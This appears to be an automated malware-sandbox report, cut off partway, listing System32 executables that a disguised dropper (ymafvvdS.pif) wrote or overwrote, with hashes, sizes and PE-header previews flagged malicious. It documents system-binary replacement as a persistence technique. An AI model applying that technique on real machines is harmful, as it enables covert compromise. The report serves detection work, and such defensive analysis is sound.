                                                                                                                                                                                                                        SSDEEP:49152:6wVFr68Vw9wn/6h8N1zidsDmg27RnWGj:6wVFrssC/dsD527BWG
                                                                                                                                                                                                                        MD5:11EB7B63D45B07D2E9811E4D818A0174
                                                                                                                                                                                                                        SHA1:400E0A4EC021282508133290A8187A929BB23FCE
                                                                                                                                                                                                                        SHA-256:9E704FE9E411474BC7BF50ECF7E65FA56689F73F348E8AEB273FD4F935E80F9D
                                                                                                                                                                                                                        SHA-512:CA500251D818826DB0B4682DAA6081F252588D279441ADED3E36F5B78DFC7EE5CA99DBEB1DBE8A9B3F9649BA81D1BBA6DD8F08C1490B1A742CF101D5456E3AD3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@......................................... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1348608
                                                                                                                                                                                                                        Entropy (8bit):7.253729790235816
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:kQW4qoNUgslKNX0Ip0MgHCpoMBOuBsqjnhMgeiCl7G0nehbGZpbD:kQW9BKNX0IPgiKMBOuVDmg27RnWGj
                                                                                                                                                                                                                        MD5:500275C60FCB5B035FD81A2BA2CB2073
                                                                                                                                                                                                                        SHA1:76098E76A8274C689CA73C9A2A4706479D1290CE
                                                                                                                                                                                                                        SHA-256:CA15CA9E777125297E77BB5A3A4AAAC742FC10A10AB4790362B7080B81162A6B
                                                                                                                                                                                                                        SHA-512:652C570586616EEC04620E4ED04C220E106272B99A48A0A22A9187A64B817723A4B5C5A2C08C87EB431956355797F1635839A0E07D7A53C1743010F56B23FC01
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1224192
                                                                                                                                                                                                                        Entropy (8bit):5.163555307805148
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:k2G7AbHjkesqjnhMgeiCl7G0nehbGZpbD:k2G7AbHjPDmg27RnWGj
                                                                                                                                                                                                                        MD5:4B67BD8AAA681D11F735DC710C48E0D8
                                                                                                                                                                                                                        SHA1:C4C2308319E6063379E88C0DDD3C06F8C40D7D98
                                                                                                                                                                                                                        SHA-256:33947CF7E895BB364EA43D43F6148CCECDB4D6FE2D81B0967D707EE527EDD40D
                                                                                                                                                                                                                        SHA-512:F065A2E1281D0B6CB14DABA1BAFC031F6937B305CA57C3C1BD410E3928E5A3CD2FFC8B02EF5172FF5693CD622E0968F27E94449A18E7852993F56043E8946847
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................(.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1242624
                                                                                                                                                                                                                        Entropy (8bit):7.288942719136332
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:skdpSI+K3S/GWei+qNv2uG3msqjnhMgeiCl7G0nehbGZpbD:s6SIGGWei2uG3qDmg27RnWGj
                                                                                                                                                                                                                        MD5:3117CDDE7FDB0851FDBCA3E7FDB7A142
                                                                                                                                                                                                                        SHA1:CD822847001CE1ECBC113AD886042B370C61EAD7
                                                                                                                                                                                                                        SHA-256:3993D265015583A7FCBE9E4D02E42FBD9DD5BEA456881CEA3E99145732B22E78
                                                                                                                                                                                                                        SHA-512:9B8EE6BB9A2C4711FBCA847FC7FD9C6AD70C2C73BDED5EA16A21ADFBAA382B9C9A82F185E145E5FB4B82536754CA0BFEAA44763459C2347A17422FA2FB21E32E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......[..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\Locator.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1141248
                                                                                                                                                                                                                        Entropy (8bit):5.01751872118564
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:oFXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:979F07784823EB9149D134FBAB0B4376
                                                                                                                                                                                                                        SHA1:317CDBE9C3979E7125E538C1062CF9FC48D15BD3
                                                                                                                                                                                                                        SHA-256:2CD35C56FF3E15DCA73EC7DF990911EC66103A8FD979E8381D1684263BB98E29
                                                                                                                                                                                                                        SHA-512:FB70A8B290E8373AD33BEB0A12BC98ADDD73B35EE1A387CF0485F70A1E603D457E32723D3995B4D1B534788E154B5FDF4C8CE36FFB8961CD0037E6787858C17D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@....................................4y.... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                        Entropy (8bit):0.32132367112088095
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:5lYXl8ta/k/uMclF6vMclFq5zUR/tz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+G2Xn:Al80kqF69Fq5zYq6CzE5Z2+fqjFXn
                                                                                                                                                                                                                        MD5:CB8CD05871B2C46B42EF4FFA61BFCB28
                                                                                                                                                                                                                        SHA1:8B335BC5EDF4AEA7F2BA2CBB814D9D0529EC1CBB
                                                                                                                                                                                                                        SHA-256:7232A17535DC01052050C3991E0CEBB7BD317D8B7844C61317549E2F4AC807F9
                                                                                                                                                                                                                        SHA-512:14E178E66AB900DB135EFA89BB390666A6621293A90AFD698288931F66E7C3A3BEB931B3055E8BD1FDBFCC80DD066DA428FDC2D1607F252B5764CAC092DA8CB5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:.@..X...X.......................................X...!........................... ........Ee.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................X.Pl...........Pe...J..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P. ........Ee............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\OpenSSH\ssh-agent.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1511424
                                                                                                                                                                                                                        Entropy (8bit):5.222903988226532
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:1ObHA4LWOsvAYFTuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:yjL3UTusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:A5F4C6CB650242AC4B9D281D7FB3AD95
                                                                                                                                                                                                                        SHA1:2351FF38B04CD26CB1C808E6B8F52585F2220543
                                                                                                                                                                                                                        SHA-256:15CE775FC9B0A4FB28877DAFE6B111974A1CDF523E6A6B92125634B22A83AB53
                                                                                                                                                                                                                        SHA-512:5D20A36FD67842142F12FCE22AA1AB46C2F6F4D3827B55D1B507F35AB26FF056DBCC73C5656960269814FE8798575842D9E9A2E4C266D98DA8C25D832006F9F3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@.....................................p.... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1235968
                                                                                                                                                                                                                        Entropy (8bit):5.18218856442812
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:xpFtQOaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IOasqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:93CC0F7EAE7D58C22855106B435E4B64
                                                                                                                                                                                                                        SHA1:491B2CF88A7376992FA8A09435D809F1356BCE7F
                                                                                                                                                                                                                        SHA-256:03BD61C0EADA9362E0B60F533C4E8618C8B711B2A704A33FAD60306F6DE32178
                                                                                                                                                                                                                        SHA-512:4F187405FA20DD10DFE8D82FC2E13A43601C5A82291F7E3766434C22D3B283704D5D64D277B99C4149083403C61E8A255643165ACF4E3D6C564B3983C8032C48
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@.......................................... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1513984
                                                                                                                                                                                                                        Entropy (8bit):7.102359054616168
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:v3frCoQItLsiLPLe24CxruW4bIhllusqjnhMgeiCl7G0nehbGZpbD:v3fzsIPLkCNuVbIhDCDmg27RnWGj
                                                                                                                                                                                                                        MD5:E0AE6E1D69AAF0851F2D210AAFBDD0FE
                                                                                                                                                                                                                        SHA1:F7C3FE3754015382818F8163D8FF8D83FE94B678
                                                                                                                                                                                                                        SHA-256:B3792AA6AF47AAAE9D8C80F89BDDC7012B80EB58192FFCC805E3FDFE6DD0C129
                                                                                                                                                                                                                        SHA-512:88AEDE5FEFD6202F086DBF8E2770A3AFDC822EB3D1B7CABCEFED13D2D26FD21BA011F4CED750B493D12FADEFA5FE9DFDFB2B42FF64988DB92C838D33A21081BD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@....................................k..... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\SensorDataService.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1846784
                                                                                                                                                                                                                        Entropy (8bit):6.939427955436724
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:JW6BApg2YuyuNDYTabvcRvNYf8km1rsqjnhMgeiCl7G0nehbGZpbD:JF2YuHNETovcvNYf8km9Dmg27RnWGj
                                                                                                                                                                                                                        MD5:3F2AB6CB57E7A0604E4E19795A526BD3
                                                                                                                                                                                                                        SHA1:C5778D1B77B0AA28F1E896BDAA612CFAFC710C94
                                                                                                                                                                                                                        SHA-256:B294DD3E489D0E9C3CBE4C9CF5A7227AAAFDCA3DFCF8CE867EE64D50C865552C
                                                                                                                                                                                                                        SHA-512:D3C7384919718FFBCBB84EBD104FA131F388D5944A0CCE89FE184E3EB7EDC12ADAAFF1395C36395BE9D967E6BA7A39465094EAB4175166302B8E222F3085F716
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p......zf.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\Spectrum.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1455616
                                                                                                                                                                                                                        Entropy (8bit):7.238877280992664
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:OiW6ZvAKF5i/dN9Bdexj9Trk+FasqjnhMgeiCl7G0nehbGZpbD:OYxF50b9Bdm9TxEDmg27RnWGj
                                                                                                                                                                                                                        MD5:07D3656AD4DF3DADDEDA88F101DE735C
                                                                                                                                                                                                                        SHA1:5E04AE069B00A9B04E276DF442F65EF628418B2D
                                                                                                                                                                                                                        SHA-256:525330FD71418435B58DAE8BADF0B16EDC3C6046BF6757AFBF242B43AC704032
                                                                                                                                                                                                                        SHA-512:7D3117B6578F5524047BF25FF7083A066B4A2A07C94BDE48E66F7A402C4EF0C68B649D05CE93EAC37CE9704DB26A454B6D3D81093966E6686C66015E2C038320
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.....................................7.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\TieringEngineService.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1455616
                                                                                                                                                                                                                        Entropy (8bit):5.476577895047903
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:jJnJ5D3WYnsqjnhMgeiCl7G0nehbGZpbD:jJnJ5DGY7Dmg27RnWGj
                                                                                                                                                                                                                        MD5:ADFE5C8879C41AEA47D22E19AC1F0F44
                                                                                                                                                                                                                        SHA1:4AB4BEF3E8690CD76C88D06A8E99114345EFF57C
                                                                                                                                                                                                                        SHA-256:3C31EDE97ADF036031D98090691805FA8AEC574E7B2476C2AA441325A498FA8C
                                                                                                                                                                                                                        SHA-512:C4FCCC8CFAE7719CE183720B1350F50BB5BB142C610A26A45BA377632A603BA61B55D59EA0F6ECE6AE87E44E5BC03F2748238D6E150A3AAF6DAA4A96856C0D5A
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@....................................\..... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\VSSVC.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2075136
                                                                                                                                                                                                                        Entropy (8bit):6.7365572773665265
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:CPK86JYTerDjfJ2313e1mP1MdnUwDmg27RnWGj:7D527BWG
                                                                                                                                                                                                                        MD5:2959272C47E0CAE99787E5E0BDDA7B2A
                                                                                                                                                                                                                        SHA1:BD5B11609EB28C6F6E774DE8631EDC11342617D6
                                                                                                                                                                                                                        SHA-256:52FC2D76DC9E7986C5E4E0436F578B8A80916F351E4F28B921493CF7E497FEF7
                                                                                                                                                                                                                        SHA-512:DFA7103B24700BA9E736E16EB0B4B2434873853B2CA34EB421E5ADA8E35C115FD023C1455082F8B9301F1EF3789CAF229901B198D5C384A2D021EA5EF05E9CD3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. .....,..... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\alg.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1225728
                                                                                                                                                                                                                        Entropy (8bit):5.163302245982073
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:AEP3R6TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:b6TsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:1F7F4AE415948A1027E513F2D23B8A5B
                                                                                                                                                                                                                        SHA1:9CE233EA690638F834ACB826D3D08DBE9D6DE1F1
                                                                                                                                                                                                                        SHA-256:B2F16B990F85848BE6ACCE5F914AEEB32C685CCD95B1B96316CAA07B68F3EAB1
                                                                                                                                                                                                                        SHA-512:50EB5E674B00A5346E22F10C193306252CB03E845D85101AD04533CF7D07FB9DBE5DC2868EDC8C455B353B20D9F09D65C1098C76ED87E6E28FF86C77DE087EDD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Roaming\3f155f6931e417df.bin

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                        Entropy (8bit):7.98670153326725
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:c6az65qqdB8adqLUo4Tj8aGpxXAs2Oml/a0W/ay8Ntq51:ac5LdqZ4Tj8aGD2hl/aF/N881
                                                                                                                                                                                                                        MD5:490D543F1BC925B48C1DD2E5525DB0FE
                                                                                                                                                                                                                        SHA1:AD0951A328B3796B04608A09954314243E7388A6
                                                                                                                                                                                                                        SHA-256:D429F1D9498B3D4E73D41219EFB065F910A5C82396A50E88195F7589220F9200
                                                                                                                                                                                                                        SHA-512:9E86ED198262E9C738AEFB4DC09B23585C992D69AF6EBA6841B4E9CE0086AD43599CBBAD3E7A9FDDCA63733DB7EC08A0EBEC34F38892655D78478A1352854850
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:b1ca]w*v...1a....m.U...f..Y.?..-..'.....;od........J..C.rj1.B_.......Z.N..}v...u`.G..FbSU..n.........)S.-8.,<...&...n.xv..)..4.!......0.O.v..;...S....).N._.nQ.."..w../{.....~x...Q....^...Z..K.._.1{ q...i.@4..s...*.5...Q...z5....}/<o....u-.%.APy.QTzY.......- ....a...;pT.K.~.J..h"4.....>-..'../M....S2....x ?..g.l.#!..$D..B}...(.=.eVL.4C..g...S.8.6@r.P..n..7Tb...a.....:...4.k....0.4\Eo\2K.j.....p."....Yki...u....D.......Hs.{N...A..bd..`..x2..........).b.....T^U......!....!........#l...AD..a...4 .*..L...GhS....[[gO..(..7.}.d^S.B..@`...jS.b.y..A.9h.t..".{"..v.]m.u..9(.^.....d...H.....0.../s.....3..[9..6.hxc...@\..`....0...*-...Wh=......,%..#...j.....DY.=.i....;<M;k^......}.....muR.v..A7...9.^m..(.......F....2z..LH/..........Z.).Z......".m.. ...DP..gz...f..3....%.,.....$[.....?&.....{......n.....H..&.A...O....d.....t#.I..9.G{....;..k.....Q.O.a.%E....c......t..h.Q..S.D(IH.....^.y.a.":.U...1.....b....G.t.".../0H.H...@0..~.lM.K..Y...`.@.n..u..-W

                                                                                                                                                                                                                        C:\Windows\System32\msdtc.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1278464
                                                                                                                                                                                                                        Entropy (8bit):5.142977586782422
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:ajkyoXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:aIyosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:7AE7553BA674284A076D19A633F7EFF0
                                                                                                                                                                                                                        SHA1:1575FD05F276CF7DB410BA80BAFC5CA1963373CA
                                                                                                                                                                                                                        SHA-256:3237C3D4C11470E4660ADD504B31ACF71F7C5A2E9A9F2163BDB7BFC999E3BE3E
                                                                                                                                                                                                                        SHA-512:6C8D04B36B46883CD84DAFCD9A118015E30784B9E1A52BB875707389578C2DD20ED3103BD9AE1C44688B894027F15F728F57AFF8DA0A33A1E70997B347EDBEF9
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@.......................................... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\msiexec.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1199616
                                                                                                                                                                                                                        Entropy (8bit):5.083881934987249
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:D4DuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:F80F4E42442149BE21C33A6CFB745A9B
                                                                                                                                                                                                                        SHA1:56031F6B78EF37E74DD1A8ADADB40684B52F5E63
